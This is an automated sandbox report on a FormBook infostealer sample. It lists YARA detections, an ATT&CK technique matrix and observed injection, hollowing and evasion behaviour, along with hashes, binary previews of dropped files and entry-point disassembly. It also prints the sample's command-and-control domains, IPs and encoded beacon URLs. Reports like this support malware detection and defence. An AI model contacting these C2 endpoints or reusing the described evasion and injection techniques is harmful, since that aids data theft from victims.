          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 0_2_00405AA7 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 1.0.nji3Lg1ot6.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.nji3Lg1ot6.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.nji3Lg1ot6.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.nji3Lg1ot6.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.nji3Lg1ot6.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.nji3Lg1ot6.exe.23e0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.nji3Lg1ot6.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.nji3Lg1ot6.exe.23e0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.nji3Lg1ot6.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.nji3Lg1ot6.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.nji3Lg1ot6.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.344927446.00000000009C0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.316886950.000000000FFA5000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.292323567.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.333023210.000000000FFA5000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.345328799.0000000000D30000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.344714240.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.294869944.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.556861627.00000000006C0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.562054407.0000000002920000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.561888247.00000000028F0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.295727882.00000000023E0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.293866561.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 1.0.nji3Lg1ot6.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.nji3Lg1ot6.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.nji3Lg1ot6.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.nji3Lg1ot6.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.nji3Lg1ot6.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.nji3Lg1ot6.exe.23e0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.nji3Lg1ot6.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.nji3Lg1ot6.exe.23e0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.nji3Lg1ot6.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.nji3Lg1ot6.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.nji3Lg1ot6.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.344927446.00000000009C0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.316886950.000000000FFA5000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.292323567.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.333023210.000000000FFA5000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.345328799.0000000000D30000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.344714240.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.294869944.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.556861627.00000000006C0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.562054407.0000000002920000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.561888247.00000000028F0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.295727882.00000000023E0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.293866561.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1DLL Side-Loading1Process Injection612Rootkit1Credential API Hooking1Security Software Discovery121Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsDLL Side-Loading1Virtualization/Sandbox Evasion2LSASS MemoryVirtualization/Sandbox Evasion2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection612Security Account ManagerProcess Discovery2SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information2LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing1Cached Domain CredentialsSystem Information Discovery13VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsDLL Side-Loading1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobFile Deletion1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 552997 Sample: nji3Lg1ot6 Startdate: 14/01/2022 Architecture: WINDOWS Score: 100 33 www.mnbvending.com 2->33 41 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->41 43 Found malware configuration 2->43 45 Malicious sample detected (through community Yara rule) 2->45 47 5 other signatures 2->47 11 nji3Lg1ot6.exe 19 2->11         started        signatures3 process4 file5 31 C:\Users\user\AppData\Local\...\mtmmtvzho.dll, PE32 11->31 dropped 57 Tries to detect virtualization through RDTSC time measurements 11->57 59 Injects a PE file into a foreign processes 11->59 15 nji3Lg1ot6.exe 11->15         started        signatures6 process7 signatures8 61 Modifies the context of a thread in another process (thread injection) 15->61 63 Maps a DLL or memory area into another process 15->63 65 Sample uses process hollowing technique 15->65 67 Queues an APC in another process (thread injection) 15->67 18 explorer.exe 15->18 injected process9 dnsIp10 35 nanasyhogar.com 50.31.177.38, 49793, 80 SERVERCENTRALUS United States 18->35 37 www.alibabasdeli.com 172.67.173.57, 49808, 80 CLOUDFLARENETUS United States 18->37 39 4 other IPs or domains 18->39 49 System process connects to network (likely due to code injection or exploit) 18->49 22 msiexec.exe 18->22         started        25 autochk.exe 18->25         started        signatures11 process12 signatures13 51 Self deletion via cmd delete 22->51 53 Modifies the context of a thread in another process (thread injection) 22->53 55 Maps a DLL or memory area into another process 22->55 27 cmd.exe 1 22->27         started        process14 process15 29 conhost.exe 27->29         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          nji3Lg1ot6.exe38%VirustotalBrowse
          nji3Lg1ot6.exe42%ReversingLabsWin32.Worm.SpyBot
          nji3Lg1ot6.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          7.2.msiexec.exe.4baf840.4.unpack100%AviraTR/Patched.Ren.GenDownload File
          7.2.msiexec.exe.2c5b358.1.unpack100%AviraTR/Patched.Ren.GenDownload File
          1.2.nji3Lg1ot6.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.1.nji3Lg1ot6.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.0.nji3Lg1ot6.exe.400000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          0.2.nji3Lg1ot6.exe.23e0000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.0.nji3Lg1ot6.exe.400000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.0.nji3Lg1ot6.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          www.mnbvending.com0%VirustotalBrowse
          www.alibabasdeli.com0%VirustotalBrowse
          shops.myshopify.com1%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.nanasyhogar.com/nk6l/?Mn6p=MMWPsHlVo7vbxfqT+E8iHGCJx4EpOMO7XTm/RW/7WjycdebsiPyF7OJFYt5Z76O5OpDL&m87=kDHx4bf0%Avira URL Cloudsafe
          www.rthearts.com/nk6l/0%Avira URL Cloudsafe
          http://www.alibabasdeli.com/nk6l/?Mn6p=zX7TWLgUTNDtCnt/XwnHS79HNPNEveCsoMI9+/ObXOF7SG2tu7bFQ30QzdtJgFVEPE8r&m87=kDHx4bf0%Avira URL Cloudsafe
          http://www.gigasupplies.com/nk6l/?Mn6p=sMbkpEIYm7OVlcdzrpiwDTFtc4P6BDcndIa3bMJ3nzzEqPK8OVYh2AVyK3PkcpAP2wum&m87=kDHx4bf0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.mnbvending.com
          		199.59.243.200
          		truefalseunknown
          www.alibabasdeli.com
          		172.67.173.57
          		truetrueunknown
          nanasyhogar.com
          		50.31.177.38
          		truetrue
            		unknown
            shops.myshopify.com
            		23.227.38.74
            		truetrueunknown
            www.nanasyhogar.com
            		unknown
            		unknowntrue
              		unknown
              www.gigasupplies.com
              		unknown
              		unknowntrue
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://www.nanasyhogar.com/nk6l/?Mn6p=MMWPsHlVo7vbxfqT+E8iHGCJx4EpOMO7XTm/RW/7WjycdebsiPyF7OJFYt5Z76O5OpDL&m87=kDHx4bftrue
                • Avira URL Cloud: safe
                		unknown
                www.rthearts.com/nk6l/true
                • Avira URL Cloud: safe
                		low
                http://www.alibabasdeli.com/nk6l/?Mn6p=zX7TWLgUTNDtCnt/XwnHS79HNPNEveCsoMI9+/ObXOF7SG2tu7bFQ30QzdtJgFVEPE8r&m87=kDHx4bftrue
                • Avira URL Cloud: safe
                		unknown
                http://www.gigasupplies.com/nk6l/?Mn6p=sMbkpEIYm7OVlcdzrpiwDTFtc4P6BDcndIa3bMJ3nzzEqPK8OVYh2AVyK3PkcpAP2wum&m87=kDHx4bftrue
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://nsis.sf.net/NSIS_Errornji3Lg1ot6.exefalse
                  		high
                  http://nsis.sf.net/NSIS_ErrorErrornji3Lg1ot6.exefalse
                    		high

                    Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public

                    IPDomainCountryFlagASNASN NameMalicious
                    172.67.173.57
                    		www.alibabasdeli.comUnited States
                    		13335CLOUDFLARENETUStrue
                    23.227.38.74
                    		shops.myshopify.comCanada
                    		13335CLOUDFLARENETUStrue
                    50.31.177.38
                    		nanasyhogar.comUnited States
                    		23352SERVERCENTRALUStrue

                    Private

                    IP
                    192.168.2.1

                    General Information

                    Joe Sandbox Version:34.0.0 Boulder Opal
                    Analysis ID:552997
                    Start date:14.01.2022
                    Start time:03:36:23
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 9m 11s
                    Hypervisor based Inspection enabled:false
                    Report type:light
                    Sample file name:nji3Lg1ot6 (renamed file extension from none to exe)
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                    Number of analysed new started processes analysed:21
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:1
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal100.troj.evad.winEXE@8/4@4/4
                    EGA Information:
                    • Successful, ratio: 100%
                    HDC Information:
                    • Successful, ratio: 24.2% (good quality ratio 21.8%)
                    • Quality average: 74.1%
                    • Quality standard deviation: 31.3%
                    HCA Information:
                    • Successful, ratio: 86%
                    • Number of executed functions: 0
                    • Number of non-executed functions: 0
                    Cookbook Comments:
                    • Adjust boot time
                    • Enable AMSI
                    Warnings:
                    Show All
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                    • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                    • Not all processes where analyzed, report is missing behavior information

                    Simulations

                    Behavior and APIs

                    No simulations

                    Joe Sandbox View / Context

                    IPs

                    No context

                    Domains

                    No context

                    ASN

                    No context

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    No context

                    Created / dropped Files

                    C:\Users\user\AppData\Local\Temp\nsx7FAE.tmp
                    Process:C:\Users\user\Desktop\nji3Lg1ot6.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):252172
                    Entropy (8bit):7.750682379260983
                    Encrypted:false
                    SSDEEP:6144:118MKS5foIrwbBl2/IO4cwyjICBga9xtqS+W:0MKS5pwdQIC99xtqA
                    MD5:8644B9AA55DCA97B4841D7C3878444C7
                    SHA1:1B7CD31D5C9509868830982D39D9A3F75B7E3AD4
                    SHA-256:C41772CB8BD860959A61F832E221F9DC634BEBD8FE4CD141E45321E348EB4181
                    SHA-512:2DEE50DCEDF000EC57222C3D12B30F7905B18977C929C14517A0DC2937DA7B6CFF0D7FBB093059AE5607AB3C3341C856FEACD4CFAC23C89F20EBBFD50B174513
                    Malicious:false
                    Reputation:low
                    Preview: .X......,.......................,C.......X.......X..........................................................................................................................................................................................................................................J...................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    C:\Users\user\AppData\Local\Temp\nsx7FAF.tmp\mtmmtvzho.dll
                    Process:C:\Users\user\Desktop\nji3Lg1ot6.exe
                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):4608
                    Entropy (8bit):3.8072208508576035
                    Encrypted:false
                    SSDEEP:24:e31GSNNCc0teIAUdax/+TCA5dieD4ueeDFE8hueeYoNXs+f3SlLRQ0K7ABPnRuVL:CnC/I9GTxieBJInFbfGFN1RuqS
                    MD5:D62257B9F46BB3ECC454D94B80E839E8
                    SHA1:A33070571B7909CEB589F9CCEB8591EE2DAE5C9F
                    SHA-256:9679F0E8F63974D80F953B8212B2668C27EC9762CDCF6ACBFD4FDF4B6D189F23
                    SHA-512:065531AFC2DA7DD6CECC893C13E41A1F15E0FC670E0DDC006E6F87CF5CB7A9B94D36275D2050953A11350590AC4D1B1B5FB89ACAA3C6B1F3F6C466D5E155F907
                    Malicious:false
                    Reputation:low
                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........z-...C]..C]..C]Z.M]..C].}B\..C]..B]..C].nG\..C].nC\..C].n.]..C].nA\..C]Rich..C]........................PE..L......a...........!......................... ...............................P............@.......................... ..H.... .......0.......................@..<.................................................... ...............................text...Q........................... ..`.rdata....... ......................@..@.rsrc........0......................@..@.reloc..<....@......................@..B........................................................................................................................................................................................................................................................................................................................................................................
                    C:\Users\user\AppData\Local\Temp\pawgjsvu
                    Process:C:\Users\user\Desktop\nji3Lg1ot6.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):4769
                    Entropy (8bit):6.209190395428905
                    Encrypted:false
                    SSDEEP:96:/s3+C1lu78g/85QphY5tVXUcbaLrVJ83Z/Lj+HNdC+cR3Sc3owy8WwXfUE/gmc01:i+CW8Q85ghY5tVkcbkU3hFdowyPwPUEX
                    MD5:2CF23E8F99E539C2CFA7DF0709FFE950
                    SHA1:B0DEF49E4CA1DE39D60696FFEC5EC6ECB9399D3C
                    SHA-256:C71C94E4AA37C19EE3E62E4F20D03CE4950D9B7BCA8755B3729CBDB7897B6FDE
                    SHA-512:0A028931CFE2F89C9324BA125DDFE576051CE68AFE556700D89EB74F0EC19DDBE1AB2C2E7AE96523CE231B47A18E5DB4935EF22E68F8708BC7663060F888D11E
                    Malicious:false
                    Reputation:low
                    Preview: ..aa\2...!zOV.,.a.V....L..V....L..,.a.LUiaaa.,.a^<.^<.4L.q.daaa(L.(\u^<.^<.4L.q..aaa(L.(\.^<.^<.4L.q..aaa(L.(\.^<.^<.4L.q..aaa(L.(\...]/+[.YR.jjL..(L.(\}2L..]..(L.(t.2L.2tU4]...[....2L.j\U4].(LUVO(,..}.[..aaaa.]=..,U^<..^<..^<. Y^<. .^<..^<....M.&I2..&I(e.A..`<.^<. .2L...(L.j,U.aaaa..=]Jaaa.]=..2,...2L....2...a\2.pp.V....L.2L.2a"L.ZA2L.2a2t.2..(\.2..](LU2L.2a!2t.(`2L.2\U2...a).k..9.aa.G.aa.a).^~...aa...aa.a)....m.aa.{.aa.a\2...i.V....L..L..aaa4L.(LU..aM.2LU.aa2LU!(LU2L.I(L..}...aa..M?2L..[..R.a(...(m.u4L..[....a(...(m.u[.[.YR.a4...q).^~..`aaq..d^^(L..4L.q^<..{^^^(L....aM..,.a..L.`aaa2L.2...]a\2...!.V....L..L.iaaa4L.(LU..aM.2LU.aa2LU!(LU2L.I(L..}..]aa....;aaa2L..[..R.a(...(m..2L..[....a(...(m..2L..[....(...(m..2L...[..R.j(...(e..4L..[.....(...(m..[.[.YR.a4...q).k...aaaq..U^^(L...aM.2L.2t.(`.^<.^<.^<.^<.^<..vW^^(L....aM..,.a..L.`aaa2L.2...a\2...5.L..aaa4L}(LU..aM.2LU.aa2LU!(LU2L.I(L..}.[jaa..M?2L..[..R.a(..}(m..2L..[....a(..}(m..[.[.YR.a4..}q)....faaaq.=U^^(L..^<
                    C:\Users\user\AppData\Local\Temp\zn2eyxxq9ww5zrdhr
                    Process:C:\Users\user\Desktop\nji3Lg1ot6.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):220020
                    Entropy (8bit):7.992864927984938
                    Encrypted:true
                    SSDEEP:6144:7MKS5foIrwbBl2/IO4cwyjICBga9xtqS+Wx:7MKS5pwdQIC99xtqAx
                    MD5:A75D055E6FABC0D24984208FC2BD8877
                    SHA1:F4071D8B3141A30FC0D70787D174B8E31C6131FC
                    SHA-256:6497E85685A07951F80AE543BB730D7714717596140569E4D5C9388F2E6CBE59
                    SHA-512:3A09EEF95C13AF84D71512DBFCDB2C6D87412844443411E2235E47797E9582A12FEA44848E1037B7C56C60E233CC2EA962E59BEE917F13C60103B2B196A51F4E
                    Malicious:false
                    Reputation:low
                    Preview: .....r_..oJ...Pae...w.;.z..o../"j...p.$(<h...g....=.}4..y_e..+;...y...r......Q.._..p5$...q.......D..@....1...>G.`.OY...2.t=.)....o.....[P.u.>q.?O..........h..q......0.).Jn..%..r.M......U..,4.T.!/......N^........d....Kqt1G..G...;...k)`=@.Ow.>I.........vf.eF....:S...-"../"c...p.$(.h...g.,..=.}4..y_;!..;...`..Hc..e.|c.8...0..O|..D.h.Q.....^*"...i3....`.`.OY..F......k8.V...D..4..ML$.....bQ...m{.....uw.;^...0.).|.].E..r.H..G...A,.T.!/........V.h......d..H.Kq[1G.........k)`D@.Qw.>I..r......v..eFR...:S.+..o../"j...p.$(<h...g....=.}4..y_;!..;...`..Hc..e.|c.8...0..O|..D.h.Q.....^*"...i3....`.`.OY..F......k8.V...D..4..ML$.....bQ...m{.....uw.;^...0.).Jn..%..r,...G..m.A,4.T.!/.......NV........d..H.Kq[1G.........k)`D@.Qw.>I..r......v..eFR...:S.+..o../"j...p.$(<h...g....=.}4..y_;!..;...`..Hc..e.|c.8...0..O|..D.h.Q.....^*"...i3....`.`.OY..F......k8.V...D..4..ML$.....bQ...m{.....uw.;^...0.).Jn..%..r,...G..m.A,4.T.!/.......NV........d.

                    Static File Info

                    General

                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                    Entropy (8bit):7.927911380419802
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 92.16%
                    • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                    • Generic Win/DOS Executable (2004/3) 0.02%
                    • DOS Executable Generic (2002/1) 0.02%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:nji3Lg1ot6.exe
                    File size:248302
                    MD5:8eddcc35719034649f6947b2b08bcdf3
                    SHA1:5506b69b4584f43232f45299192a540ec0197998
                    SHA256:0d072a60b433f330d2ba97d75eae7af07e9d75bc6ed5b1065287661d05e82ab6
                    SHA512:c7716daafffd44dff6143d7fe0fb686eb5fc08da918aab204ae6d7c8687dc914d9310d488a2ffc4767e5fd643e8aee6d88fadf28d156c6be731c29bcc3943681
                    SSDEEP:6144:owzN+wRSsYU12O6NgFRQbIuoKFFmhmvk8nw:fN+w8KCWRbRKF7vkR
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........uJ...$...$...$./.{...$...%.:.$.".y...$..7....$.f."...$.Rich..$.................PE..L......H.................Z..........%2.....

                    File Icon

                    Icon Hash:b2a88c96b2ca6a72

                    Static PE Info

                    General

                    Entrypoint:0x403225
                    Entrypoint Section:.text
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                    DLL Characteristics:
                    Time Stamp:0x48EFCDC9 [Fri Oct 10 21:48:57 2008 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:4
                    OS Version Minor:0
                    File Version Major:4
                    File Version Minor:0
                    Subsystem Version Major:4
                    Subsystem Version Minor:0
                    Import Hash:099c0646ea7282d232219f8807883be0

                    Entrypoint Preview

                    Instruction
                    sub esp, 00000180h
                    push ebx
                    push ebp
                    push esi
                    xor ebx, ebx
                    push edi
                    mov dword ptr [esp+18h], ebx
                    mov dword ptr [esp+10h], 00409128h
                    xor esi, esi
                    mov byte ptr [esp+14h], 00000020h
                    call dword ptr [00407030h]
                    push 00008001h
                    call dword ptr [004070B4h]
                    push ebx
                    call dword ptr [0040727Ch]
                    push 00000008h
                    mov dword ptr [00423F58h], eax
                    call 00007F1618B45960h
                    mov dword ptr [00423EA4h], eax
                    push ebx
                    lea eax, dword ptr [esp+34h]
                    push 00000160h
                    push eax
                    push ebx
                    push 0041F450h
                    call dword ptr [00407158h]
                    push 004091B0h
                    push 004236A0h
                    call 00007F1618B45617h
                    call dword ptr [004070B0h]
                    mov edi, 00429000h
                    push eax
                    push edi
                    call 00007F1618B45605h
                    push ebx
                    call dword ptr [0040710Ch]
                    cmp byte ptr [00429000h], 00000022h
                    mov dword ptr [00423EA0h], eax
                    mov eax, edi
                    jne 00007F1618B42E2Ch
                    mov byte ptr [esp+14h], 00000022h
                    mov eax, 00429001h
                    push dword ptr [esp+14h]
                    push eax
                    call 00007F1618B450F8h
                    push eax
                    call dword ptr [0040721Ch]
                    mov dword ptr [esp+1Ch], eax
                    jmp 00007F1618B42E85h
                    cmp cl, 00000020h
                    jne 00007F1618B42E28h
                    inc eax
                    cmp byte ptr [eax], 00000020h
                    je 00007F1618B42E1Ch
                    cmp byte ptr [eax], 00000022h
                    mov byte ptr [eax+eax+00h], 00000000h

                    Rich Headers

                    Programming Language:
                    • [EXP] VC++ 6.0 SP5 build 8804

                    Data Directories

                    NameVirtual AddressVirtual Size Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IMPORT0x73a40xb4.rdata
                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x2c0000x900.rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IAT0x70000x28c.rdata
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                    Sections

                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                    .text0x10000x59760x5a00False0.668619791667data6.46680044621IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    .rdata0x70000x11900x1200False0.444878472222data5.17796812871IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .data0x90000x1af980x400False0.55078125data4.68983486809IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                    .ndata0x240000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .rsrc0x2c0000x9000xa00False0.409375data3.94693169534IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                    Resources

                    NameRVASizeTypeLanguageCountry
                    RT_ICON0x2c1900x2e8dataEnglishUnited States
                    RT_DIALOG0x2c4780x100dataEnglishUnited States
                    RT_DIALOG0x2c5780x11cdataEnglishUnited States
                    RT_DIALOG0x2c6980x60dataEnglishUnited States
                    RT_GROUP_ICON0x2c6f80x14dataEnglishUnited States
                    RT_MANIFEST0x2c7100x1ebXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                    Imports

                    DLLImport
